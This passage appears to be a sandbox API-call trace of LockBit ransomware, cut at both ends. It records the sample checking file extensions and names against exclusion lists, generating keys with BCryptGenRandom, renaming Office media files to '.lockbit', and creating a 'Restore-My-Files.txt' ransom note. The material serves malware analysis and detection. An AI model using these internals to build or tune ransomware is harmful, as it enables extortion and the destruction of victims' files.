returned -1 [0196.467] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0196.467] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0196.467] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0196.467] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0196.467] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0196.467] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0196.467] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0196.467] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0196.467] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0196.467] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0196.467] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0196.467] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0196.467] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0196.467] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0196.467] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0196.467] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0196.467] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0196.467] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0196.467] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0196.467] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0196.467] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0196.467] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0196.468] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0196.468] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0196.468] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0196.468] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0196.468] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0196.468] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0158007.WMF.lockbit") returned 70 [0196.468] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0158007.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0158007.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0196.469] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0196.469] malloc (_Size=0x40068) returned 0x3df0008 [0196.469] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=5158) returned 1 [0196.469] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.470] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.470] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0196.470] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.471] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.471] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0196.471] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0196.484] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0158007.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0158007.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0196.484] malloc (_Size=0xa2) returned 0x1fa2ed8 [0196.484] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa2, FileInformationClass=0xa) returned 0xc0000008 [0196.485] free (_Block=0x1fa2ed8) [0196.485] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0158007.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10") returned 1 [0196.486] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt") returned 70 [0196.486] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0196.486] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdf00c800, ftCreationTime.dwHighDateTime=0x1bdf6f6, ftLastAccessTime.dwLowDateTime=0xbd47aa20, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xdf00c800, ftLastWriteTime.dwHighDateTime=0x1bdf6f6, nFileSizeHigh=0x0, nFileSizeLow=0x4d38, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0183168.WMF", cAlternateFileName="")) returned 1 [0196.486] lstrcmpiW (lpString1=".", lpString2="J0183168.WMF") returned -1 [0196.486] lstrcmpiW (lpString1="..", lpString2="J0183168.WMF") returned -1 [0196.486] PathFindExtensionW (pszPath="J0183168.WMF") returned=".WMF" [0196.486] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0196.486] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0196.486] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0196.486] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0196.486] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0196.486] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0196.486] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0196.486] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0196.486] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0196.486] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0196.486] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0196.486] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0196.486] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0196.486] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0196.486] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0196.486] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0196.486] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0196.487] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0196.487] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0196.487] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0196.487] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0196.487] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0196.487] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0196.487] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0196.487] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0196.487] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0196.487] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0196.487] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0196.487] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0196.487] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0196.487] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0196.487] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0196.487] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0196.487] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0196.487] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0196.487] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0196.487] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0196.487] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0196.487] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0196.487] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0196.487] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0196.487] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0196.487] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0196.487] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0196.488] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0196.488] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0196.488] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0196.488] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0183168.WMF") returned 1 [0196.488] lstrcmpiW (lpString1="ntldr", lpString2="J0183168.WMF") returned 1 [0196.488] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0183168.WMF") returned 1 [0196.488] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0183168.WMF") returned -1 [0196.488] lstrcmpiW (lpString1="autorun.inf", lpString2="J0183168.WMF") returned -1 [0196.488] lstrcmpiW (lpString1="thumbs.db", lpString2="J0183168.WMF") returned 1 [0196.488] lstrcmpiW (lpString1="iconcache.db", lpString2="J0183168.WMF") returned -1 [0196.488] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\") returned="" [0196.488] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0183168.WMF") returned=".WMF" [0196.488] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0196.488] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0196.488] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0196.488] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0196.488] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0196.488] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0196.488] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0196.488] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0196.488] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0196.489] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0196.489] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0196.489] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0196.489] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0196.489] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0196.489] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0196.489] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0196.489] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0196.489] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0196.489] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0196.489] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0196.489] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0196.489] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0196.489] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0196.489] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0196.489] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0196.489] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0196.489] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0196.489] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0196.489] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0183168.WMF.lockbit") returned 70 [0196.489] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0183168.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0183168.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0196.492] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0196.492] malloc (_Size=0x40068) returned 0x3df0008 [0196.492] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=19768) returned 1 [0196.492] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.493] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.493] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0196.493] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.493] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.493] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0196.493] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0196.498] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0183168.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0183168.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0196.498] malloc (_Size=0xa2) returned 0x1fa2ed8 [0196.498] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa2, FileInformationClass=0xa) returned 0x0 [0196.506] free (_Block=0x1fa2ed8) [0196.506] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0183168.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10") returned 1 [0196.506] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt") returned 70 [0196.506] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0196.506] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9d86900, ftCreationTime.dwHighDateTime=0x1bdf6f7, ftLastAccessTime.dwLowDateTime=0xbd47aa20, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xc9d86900, ftLastWriteTime.dwHighDateTime=0x1bdf6f7, nFileSizeHigh=0x0, nFileSizeLow=0x7018, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0183290.WMF", cAlternateFileName="")) returned 1 [0196.506] lstrcmpiW (lpString1=".", lpString2="J0183290.WMF") returned -1 [0196.506] lstrcmpiW (lpString1="..", lpString2="J0183290.WMF") returned -1 [0196.506] PathFindExtensionW (pszPath="J0183290.WMF") returned=".WMF" [0196.506] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0196.506] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0196.506] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0196.506] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0196.506] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0196.506] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0196.506] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0196.506] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0196.506] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0196.506] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0196.506] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0196.506] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0196.506] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0196.506] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0196.506] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0196.507] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0196.507] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0196.507] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0196.507] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0196.507] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0196.507] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0196.507] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0196.507] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0196.507] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0196.507] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0196.507] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0196.507] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0196.507] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0196.507] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0196.507] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0196.507] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0196.507] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0196.507] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0196.507] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0196.507] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0196.507] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0196.507] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0196.507] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0196.507] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0196.507] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0196.507] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0196.507] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0196.508] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0196.508] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0196.508] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0196.508] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0196.508] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0196.508] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0183290.WMF") returned 1 [0196.508] lstrcmpiW (lpString1="ntldr", lpString2="J0183290.WMF") returned 1 [0196.508] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0183290.WMF") returned 1 [0196.508] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0183290.WMF") returned -1 [0196.508] lstrcmpiW (lpString1="autorun.inf", lpString2="J0183290.WMF") returned -1 [0196.508] lstrcmpiW (lpString1="thumbs.db", lpString2="J0183290.WMF") returned 1 [0196.508] lstrcmpiW (lpString1="iconcache.db", lpString2="J0183290.WMF") returned -1 [0196.508] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\") returned="" [0196.508] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0183290.WMF") returned=".WMF" [0196.508] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0196.508] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0196.508] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0196.508] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0196.508] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0196.508] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0196.508] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0196.508] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0196.508] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0196.508] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0196.508] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0196.508] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0196.508] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0196.508] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0196.508] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0196.509] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0196.509] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0196.509] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0196.509] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0196.509] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0196.509] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0196.509] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0196.509] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0196.509] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0196.509] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0196.509] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0196.509] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0196.509] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0196.509] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0183290.WMF.lockbit") returned 70 [0196.509] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0183290.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0183290.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0196.511] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0196.511] malloc (_Size=0x40068) returned 0x3df0008 [0196.511] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=28696) returned 1 [0196.511] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.511] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.511] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0196.511] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.512] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.512] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0196.512] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0196.516] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0183290.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0183290.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0196.516] malloc (_Size=0xa2) returned 0x1fa2ed8 [0196.516] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa2, FileInformationClass=0xa) returned 0x0 [0196.526] free (_Block=0x1fa2ed8) [0196.526] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0183290.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10") returned 1 [0196.526] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt") returned 70 [0196.526] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0196.526] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf8564400, ftCreationTime.dwHighDateTime=0x1bdf6f7, ftLastAccessTime.dwLowDateTime=0xbd47aa20, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xf8564400, ftLastWriteTime.dwHighDateTime=0x1bdf6f7, nFileSizeHigh=0x0, nFileSizeLow=0x14fa, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0183328.WMF", cAlternateFileName="")) returned 1 [0196.526] lstrcmpiW (lpString1=".", lpString2="J0183328.WMF") returned -1 [0196.526] lstrcmpiW (lpString1="..", lpString2="J0183328.WMF") returned -1 [0196.526] PathFindExtensionW (pszPath="J0183328.WMF") returned=".WMF" [0196.526] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0196.526] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0196.526] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0196.526] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0196.526] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0196.526] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0196.526] lstrcmpiW 